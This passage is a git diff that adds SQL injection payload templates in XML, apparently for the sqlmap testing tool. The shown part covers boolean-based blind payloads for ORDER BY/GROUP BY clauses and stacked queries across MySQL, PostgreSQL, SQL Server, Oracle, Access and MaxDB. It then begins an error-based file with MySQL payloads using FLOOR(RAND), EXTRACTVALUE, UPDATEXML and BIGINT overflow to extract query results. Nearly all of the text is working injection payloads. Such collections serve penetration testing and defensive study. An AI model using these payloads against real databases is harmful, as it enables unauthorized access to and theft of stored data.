+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!--
+         TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] with single quotes, but then other payloads would break.
+               It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is
+    -->
+    <test>
+        <!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->
+        <title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <!-- <clause>2,3</clause> -->
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,IIF([INFERENCE],1,1/0)</vector>
+        <request>
+            <payload>,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
+        </request>
+        <response>
+            <comparison>,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+        <request>
+            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+        </request>
+        <response>
+            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>
+        <request>
+            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+        <request>
+            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
+
+    <!-- Boolean-based blind tests - Stacked queries -->
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
+    <test>
+        <title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
+        <request>
+            <payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
+        <request>
+            <payload>;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IIF([INFERENCE],1,1/0)</vector>
+        <request>
+            <payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
+        <request>
+            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - Stacked queries -->
+</root>
diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
new file mode 100644
index 000000000..2b2354d2f
--- /dev/null
+++ b/xml/payloads/02_error_based.xml
@@ -0,0 +1,1051 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
+    <test>
+        <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <!-- It does not work against ORDER BY or GROUP BY clause -->
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
